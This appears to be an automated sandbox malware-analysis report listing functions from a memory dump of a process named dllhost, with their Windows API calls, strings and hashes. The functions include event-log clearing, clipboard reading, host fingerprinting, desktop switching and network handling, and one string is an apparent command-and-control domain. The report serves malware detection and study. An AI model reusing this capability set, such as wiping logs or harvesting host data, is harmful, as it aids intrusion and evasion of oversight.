Instruction Fuzzy Hash: 4441D472920B19EBDB31DB289C49FEB7778AB45700F1841D5F509AB180DBB16BC9CB90

Function 032A6D49 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57libraryloadersleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032A6D5E
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 032A6D6C
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 032A6DA2
CloseHandle.KERNEL32(?), ref: 032A6DB8
Sleep.KERNEL32(00000001), ref: 032A6DC0
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 032A6DCC
FreeLibrary.KERNEL32(00000000), ref: 032A6DE1

Strings

InternetReadFile, xrefs: 032A6D66
InternetCloseHandle, xrefs: 032A6DC6

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressProc$CloseFileFreeHandleLibrarySleepWrite_memset
String ID: InternetCloseHandle$InternetReadFile
API String ID: 586530251-535091292
Opcode ID: 5f0bf03886b24237963196178a66c21624c2cbbc252e00d066883935dae2c322
Instruction ID: 336ef69ff9f68e4b4764d411fad0a67666013e4f7d37418d734fc209e9890bfb
Opcode Fuzzy Hash: 5f0bf03886b24237963196178a66c21624c2cbbc252e00d066883935dae2c322
Instruction Fuzzy Hash: BB1151F6910618ABDB20EB649C85FEEB37CAB84700F008589E309A6145CB745AC6CFA4

Function 032A4D80 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 032A4DA8
GetComputerNameA.KERNEL32(00000000,?), ref: 032A4DC8
lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4DDE
_memset.LIBCMT ref: 032A4DF2
wsprintfA.USER32 ref: 032A4E0A
lstrlenA.KERNEL32(?), ref: 032A4E14

Strings

Time, xrefs: 032A4E22
UnKnow, xrefs: 032A4DD2
SOFTWARE\%s\, xrefs: 032A4E04

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memset$ComputerNamelstrcpylstrlenwsprintf
String ID: SOFTWARE\%s\$Time$UnKnow
API String ID: 3529005902-722125974
Opcode ID: 37bfb3b1ad6a4193f50ab8f174bb788567ebbd05f8c607c13ed749cc6cb6a296
Instruction ID: af37a13f2c7a59e2670c8c8da6cae53f8d5ad951af4a3f3246d94da40bbafcfb
Opcode Fuzzy Hash: 37bfb3b1ad6a4193f50ab8f174bb788567ebbd05f8c607c13ed749cc6cb6a296
Instruction Fuzzy Hash: 0011A3B5950318AFDB20EB69EC49F9E777CAF44700F0044D9E609E6181EBB59B94CB60

Function 032A3410 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,1D2AA39B), ref: 032A3445
GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 032A345C
GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 032A3466
GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 032A346E

Part of subcall function 032A31C0: LoadLibraryA.KERNEL32(user32.dll,1D2AA39B), ref: 032A320A
Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 032A3220
Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 032A322E
Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 032A323C
Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 032A324A
Part of subcall function 032A31C0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 032A3257
Part of subcall function 032A31C0: GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 032A3267

Strings

OpenInputDesktop, xrefs: 032A3450
OpenDesktopA, xrefs: 032A3460
CloseDesktop, xrefs: 032A3468
user32.dll, xrefs: 032A3440

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
API String ID: 2238633743-3711086354
Opcode ID: 0dd26173507dca3bd2e47b5c7a309b19c5a5c514d3b24ea408a4318e9d37835e
Instruction ID: 4b51360ae0dfd88d4d05074d9787a18b1e0e36b4dd19592d62e2208239173fbb
Opcode Fuzzy Hash: 0dd26173507dca3bd2e47b5c7a309b19c5a5c514d3b24ea408a4318e9d37835e
Instruction Fuzzy Hash: F9110176A40B18AFDB00EFA9DC45BAFFBF8FF44B10F10412AE915E3241D7B458408AA4

Function 032A3D30 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032A3D4C
_memset.LIBCMT ref: 032A3D5D

Part of subcall function 032A4A70: _memset.LIBCMT ref: 032A4AD6
Part of subcall function 032A4A70: _memset.LIBCMT ref: 032A4AE9
Part of subcall function 032A4A70: _memset.LIBCMT ref: 032A4AFC
Part of subcall function 032A4A70: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4B09
Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 032A4B23
Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 032A4B31
Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 032A4B3F
Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 032A4B47
Part of subcall function 032A4A70: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 032A4B4F
Part of subcall function 032A4A70: RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4B7C
Part of subcall function 032A4A70: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4D13

lstrlenA.KERNEL32(00000000), ref: 032A3D84
lstrcpyA.KERNEL32(Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz,UnKnow), ref: 032A3D9E

Strings

ProcessorNameString, xrefs: 032A3D66
Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, xrefs: 032A3D47, 032A3D99, 032A3DA9
UnKnow, xrefs: 032A3D94
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 032A3D73

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressProc_memset$Library$FreeLoadOpenlstrcpylstrlen
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz$ProcessorNameString$UnKnow
API String ID: 91903147-2537824486
Opcode ID: e487e0f9170d8ffbbf2698171662741362ab60f70f8a71cce6249ad2b9c99a33
Instruction ID: c8e04e1abbf5e364939f9bc51e618af1b974944f87a2525ba263d7532f81ab3b
Opcode Fuzzy Hash: e487e0f9170d8ffbbf2698171662741362ab60f70f8a71cce6249ad2b9c99a33
Instruction Fuzzy Hash: AD01D634760B0CABDA10EBEC9C06F9D73749F48B40F608414B606BE1C5DBF069D8C695

Function 032A66D0 Relevance: 13.6, APIs: 9, Instructions: 84synchronizationsleepstringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032A6710
lstrcpyA.KERNEL32(?,?), ref: 032A672F
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 032A675D
CreateThread.KERNEL32(00000000,00000000,Function_000134E0,Function_00014360,00000000,00000000), ref: 032A677D
WaitForSingleObject.KERNEL32(?,000000FF), ref: 032A678E
CloseHandle.KERNEL32(?), ref: 032A679B
Sleep.KERNEL32(?), ref: 032A67A8
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 032A67BB
CloseHandle.KERNEL32(00000000), ref: 032A67C2

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CloseCreateHandleObjectSingleWait$EventSleepThread_memsetlstrcpy
String ID:
API String ID: 1863454284-0
Opcode ID: 2899de2378f73e163ff06d40457b09babc16bb3cfbd655f8773d80dba22e14ad
Instruction ID: b6441a95c39b2abc81b987d28ac7e5f7a8560250e1ce667d6062c29be19aae41
Opcode Fuzzy Hash: 2899de2378f73e163ff06d40457b09babc16bb3cfbd655f8773d80dba22e14ad
Instruction Fuzzy Hash: A9319A72A1031CABDB14DB65EC49BDA7778AB48710F008599E719EB1C0CB7155C4CFA0

Function 032A6310 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 182threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 032928EE: _malloc.LIBCMT ref: 03292908

_memset.LIBCMT ref: 032A6358
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 032A6449
CreateThread.KERNEL32(00000000,00000000,Function_000134E0,Function_00015EF0,00000000,00000000), ref: 032A6469
WaitForSingleObject.KERNEL32(?,000000FF), ref: 032A647A
CloseHandle.KERNEL32(?), ref: 032A6487
CreateThread.KERNEL32(00000000,00000000,Function_00015EF0,00000000,00000000,00000000), ref: 032A6535

Strings

yxxx, xrefs: 032A6387

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Create$Thread$CloseEventHandleObjectSingleWait_malloc_memset
String ID: yxxx
API String ID: 3710809023-3567846162
Opcode ID: 62edda56b64c8420a77d2b46830bbde2c1504f8b44ba2b742d397d7566904589
Instruction ID: 45fa2bb9113bc075a3f7ccfa41f489671e553ea71ebf84d37a94584548e635ba
Opcode Fuzzy Hash: 62edda56b64c8420a77d2b46830bbde2c1504f8b44ba2b742d397d7566904589
Instruction Fuzzy Hash: C9612C75A102189BDB24DF18DC81BD9B7B5EB48310F1840E6EA49AF381CBB16ED5CF90

Function 032A5050 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 106libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,?), ref: 032A5070
GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 032A507F
LoadLibraryA.KERNEL32(?), ref: 032A50BE

Part of subcall function 0329348D: _malloc.LIBCMT ref: 0329349B

GetProcAddress.KERNEL32(00000000,?), ref: 032A512C
FreeLibrary.KERNEL32(?), ref: 032A5173

Strings

IsBadReadPtr, xrefs: 032A5076
kernel32.dll, xrefs: 032A5061

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Library$AddressLoadProc$Free_malloc
String ID: IsBadReadPtr$kernel32.dll
API String ID: 1447571555-2271619998
Opcode ID: f72ecedbff80f30e6eee584cda4269ceb2ab93fbf021cd4ccd932e4e72d7d03b
Instruction ID: 35e97fc0d71d253a4ef0062a525911c5f973717dcb70b662134619e73269ae97
Opcode Fuzzy Hash: f72ecedbff80f30e6eee584cda4269ceb2ab93fbf021cd4ccd932e4e72d7d03b
Instruction Fuzzy Hash: B4415B71A10A0AEFDB10CF69D884A6BF7B8FF45B44F298069DC95E7241D770E980CB90

Function 032A36C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 032A36CC
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 032A36E7
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 032A36F1
FreeLibrary.KERNEL32(00000000), ref: 032A3705

Strings

GetCurrentProcess, xrefs: 032A36E9
IsWow64Process, xrefs: 032A36DA
kernel32.dll, xrefs: 032A36C7

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
API String ID: 2256533930-2522683910
Opcode ID: 64dd24093e186923ae987e7e5b4609fb388825fe794b166d16d07b94fa9d3219
Instruction ID: 55db9ed0b1065efc71b545b994be47febbcec65d90cff6eafef1b46db55361be
Opcode Fuzzy Hash: 64dd24093e186923ae987e7e5b4609fb388825fe794b166d16d07b94fa9d3219
Instruction Fuzzy Hash: A5F0A775511B1CBFC710E7ADAC49DAFB76CDF86691B110145FD04D32049F759D4095B0

Function 032A70A0 Relevance: 12.1, APIs: 8, Instructions: 53synchronizationnetworkCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,762323A0,?,032A46B5), ref: 032A70D2
CloseHandle.KERNEL32(?), ref: 032A70DF
CloseHandle.KERNEL32(?,762323A0,?,032A46B5), ref: 032A70E8
DeleteCriticalSection.KERNEL32(?), ref: 032A70F1
WSACleanup.WS2_32 ref: 032A70F7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 032A7119
VirtualFree.KERNEL32(?,00000000,00008000), ref: 032A7131
VirtualFree.KERNEL32(?,00000000,00008000), ref: 032A7149

Part of subcall function 032A6EF0: setsockopt.WS2_32(000000FF,0000FFFF,00000080,?,00000004), ref: 032A6F12
Part of subcall function 032A6EF0: CancelIo.KERNEL32(000000FF,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F1F
Part of subcall function 032A6EF0: InterlockedExchange.KERNEL32(00000000,00000000), ref: 032A6F2E
Part of subcall function 032A6EF0: closesocket.WS2_32(000000FF), ref: 032A6F3B
Part of subcall function 032A6EF0: SetEvent.KERNEL32(?,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F48

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: FreeVirtual$CloseHandle$CancelCleanupCriticalDeleteEventExchangeInterlockedObjectSectionSingleWaitclosesocketsetsockopt
String ID:
API String ID: 1236122821-0
Opcode ID: a5b98b6a23cbd39ffa3d9af637114dc1867b15263322b963902655cc5bcd1f27
Instruction ID: be08c78261373b0a036094c2e7ed368de6022d3bc18eefdad6251e406383f345
Opcode Fuzzy Hash: a5b98b6a23cbd39ffa3d9af637114dc1867b15263322b963902655cc5bcd1f27
Instruction Fuzzy Hash: 47119170210F019BC630EB7E9C48B56B7E86F44B10F198A0DE5A1E72D0CB70F484CBA4

Function 032A5D90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 032A5D9A
GetClipboardData.USER32(00000001), ref: 032A5DAA
GlobalLock.KERNEL32(00000000), ref: 032A5DB4
GlobalUnlock.KERNEL32(?), ref: 032A5E83
CloseClipboard.USER32 ref: 032A5E89

Strings

NULL, xrefs: 032A5DC0

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID: NULL
API String ID: 1006321803-324932091
Opcode ID: 1a068b2843dc4136fe1e584159dc8b258b588dc72f65eba58bd08bca6df4dab5
Instruction ID: 14a8c621b2d6be77dba4c35495455fbf42796c280968b3e5fa7fa026b6810ab0
Opcode Fuzzy Hash: 1a068b2843dc4136fe1e584159dc8b258b588dc72f65eba58bd08bca6df4dab5
Instruction Fuzzy Hash: 5731F479500B45ABC711DB2CA858AD77BF99F86300B1DC1A4E889CB305EA70D648C7D0

Function 032943AB Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,032AC518,00000008,032944B3,00000000,00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C), ref: 032943BC
__lock.LIBCMT ref: 032943F0

Part of subcall function 0329A278: __mtinitlocknum.LIBCMT ref: 0329A28E
Part of subcall function 0329A278: __amsg_exit.LIBCMT ref: 0329A29A
Part of subcall function 0329A278: EnterCriticalSection.KERNEL32(00000000,00000000,?,03294583,0000000D,032AC540,00000008,0329467A,00000000,?,03293AE9,00000000,032AC4B8,00000008,03293B4E,?), ref: 0329A2A2

InterlockedIncrement.KERNEL32(?), ref: 032943FD
__lock.LIBCMT ref: 03294411
___addlocaleref.LIBCMT ref: 0329442F

Strings

KERNEL32.DLL, xrefs: 032943B7

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: b7432206f47e01338466e0a45397006abf327f7675877d097ef73dd31298c74f
Instruction ID: af85ba7b818c178be000cd91e6c16393eaf62d32d28d80faa90ec375f4783721
Opcode Fuzzy Hash: b7432206f47e01338466e0a45397006abf327f7675877d097ef73dd31298c74f
Instruction Fuzzy Hash: 46018475551B04DFFB20EF6AD809749FBE0BF50320F20894ED4969B690CBB0A6C5CB15

Function 032A55C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

OpenEventLogA.ADVAPI32(00000000,032AB7DC), ref: 032A55ED
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 032A55F8
CloseEventLog.ADVAPI32(00000000), ref: 032A55FF

Strings

Security, xrefs: 032A55D6
System, xrefs: 032A55DD
Application, xrefs: 032A55CF

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: 94c757ad1ed8ae553d0bd5c2e9924141a9cd42428f2f6841942b5808bffd41af
Instruction ID: 3dd3dc529a06eaab4805ba6eb55f97986cbf63f41ed0215ef1341c44b739bc2a
Opcode Fuzzy Hash: 94c757ad1ed8ae553d0bd5c2e9924141a9cd42428f2f6841942b5808bffd41af
Instruction Fuzzy Hash: 42F0A037A01A1867C211EA9FAC8CB8FFBBCAF45741F008051EA08D7200D6704985CBA9

Function 032A23BD Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 032A23DE

Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8

__getptd.LIBCMT ref: 032A23EF
__getptd.LIBCMT ref: 032A23FD

Strings

csm, xrefs: 032A23D7
RCC, xrefs: 032A23C9
MOC, xrefs: 032A23D0

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 5ff6f26a87c0c3e5c503b97343bda7331f47ee5ac7169556d7096976f886bea8
Instruction ID: f62ea7a99af3f532898245adc44c8d3d2494c4afe5f1ecc3ce26b26e29a25d48
Opcode Fuzzy Hash: 5ff6f26a87c0c3e5c503b97343bda7331f47ee5ac7169556d7096976f886bea8
Instruction Fuzzy Hash: CDE01234134705CFDB10EB6DD18977832D4AF85314F5A18A3D41CCB222C7A8E4E14963

Function 032A3C50 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 032928EE: _malloc.LIBCMT ref: 03292908

Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB

wsprintfA.USER32 ref: 032A3CC4
lstrcpyA.KERNEL32(00000004,---+++***bbb,?,?,?), ref: 032A3CEF
lstrcpyA.KERNEL32(00000004,api.mods4ws.me,?,?,?), ref: 032A3D0D

Strings

api.mods4ws.me, xrefs: 032A3D04
CopyC, xrefs: 032A3C65
---+++***bbb, xrefs: 032A3CE6

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memsetlstrcpy$wsprintf$ComputerName_malloc
String ID: ---+++***bbb$CopyC$api.mods4ws.me
API String ID: 98932487-2030633342
Opcode ID: 49e44ebf67c1f91464bd7dd7475c4a98bfbaab63399e78b3c7e443ddf8db168d
Instruction ID: 08b6d2899dceb96230f2c85206bbc06504f39eae640efbdc2fc5cf490349b488
Opcode Fuzzy Hash: 49e44ebf67c1f91464bd7dd7475c4a98bfbaab63399e78b3c7e443ddf8db168d
Instruction Fuzzy Hash: 99213B79710B05ABC700DF5DFC48B99B7A9FB48315F0441A9DA09C7200DB759598C7A0

Function 032A266F Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 032A2697

Part of subcall function 032A2227: __getptd.LIBCMT ref: 032A2235
Part of subcall function 032A2227: __getptd.LIBCMT ref: 032A2243

__getptd.LIBCMT ref: 032A26A1

Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8

__getptd.LIBCMT ref: 032A26AF
__getptd.LIBCMT ref: 032A26BD
__getptd.LIBCMT ref: 032A26C8
_CallCatchBlock2.LIBCMT ref: 032A26EE

Part of subcall function 032A22CC: __CallSettingFrame@12.LIBCMT ref: 032A2318

Part of subcall function 032A2795: __getptd.LIBCMT ref: 032A27A4
Part of subcall function 032A2795: __getptd.LIBCMT ref: 032A27B2

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: eaf66e637999d5ae7679a19a23cba6b3d988fadf5ca8f715f33f63afdead8724
Instruction ID: 5f60e55c3fadb4a6e62db8823fdd769db24e72fd0d743de5065976c3ac3553f0
Opcode Fuzzy Hash: eaf66e637999d5ae7679a19a23cba6b3d988fadf5ca8f715f33f63afdead8724
Instruction Fuzzy Hash: 6511EC75D10309DFDF00EFA4C844AAD77B0FF09311F51846AE814AB250DB789A559F65

Function 0329A807 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0329A813

Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8

__amsg_exit.LIBCMT ref: 0329A833
__lock.LIBCMT ref: 0329A843
InterlockedDecrement.KERNEL32(?), ref: 0329A860
_free.LIBCMT ref: 0329A873
InterlockedIncrement.KERNEL32(05071680), ref: 0329A88B

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 1d145a3af1cdd005f67cf7c433afc2d68a58b301b081a75802dcbdf9c8c4d651
Instruction ID: 2c5ccb3371753ebc0e80faa804cb947f3509114a815c255a220467bdf5fa774b
Opcode Fuzzy Hash: 1d145a3af1cdd005f67cf7c433afc2d68a58b301b081a75802dcbdf9c8c4d651
Instruction Fuzzy Hash: B201A135920B26EBFF51FB29B40875DB7A0BF04750F094586E815AB284C774A9C3CBD1

Function 03291740 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03291758

Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 0329208B
Part of subcall function 03292076: __CxxThrowException@8.LIBCMT ref: 032920A0
Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 032920B1

std::_Xinvalid_argument.LIBCPMT ref: 03291776
std::_Xinvalid_argument.LIBCPMT ref: 03291791

Strings

invalid string position, xrefs: 03291753
string too long, xrefs: 03291771, 0329178C

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw
String ID: invalid string position$string too long
API String ID: 4225265588-4289949731
Opcode ID: e54b6263a477c57d8ec47ddd957a64d0155b6342e507cf84e54336005f5fcc7b
Instruction ID: 7f7a7cabcef780559dcc5bb4d4859721f4e045402029ebdb5c76911e7a2a99d9
Opcode Fuzzy Hash: e54b6263a477c57d8ec47ddd957a64d0155b6342e507cf84e54336005f5fcc7b
Instruction Fuzzy Hash: BD21EB367203079FFB24DD6DEC80A6AF7E9BF91650B244A6FE4528B650D371E890C351

Function 032928EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03292908

Part of subcall function 0329364E: __FF_MSGBANNER.LIBCMT ref: 03293667
Part of subcall function 0329364E: __NMSG_WRITE.LIBCMT ref: 0329366E
Part of subcall function 0329364E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293), ref: 03293693

std::exception::exception.LIBCMT ref: 0329293D
std::exception::exception.LIBCMT ref: 03292957
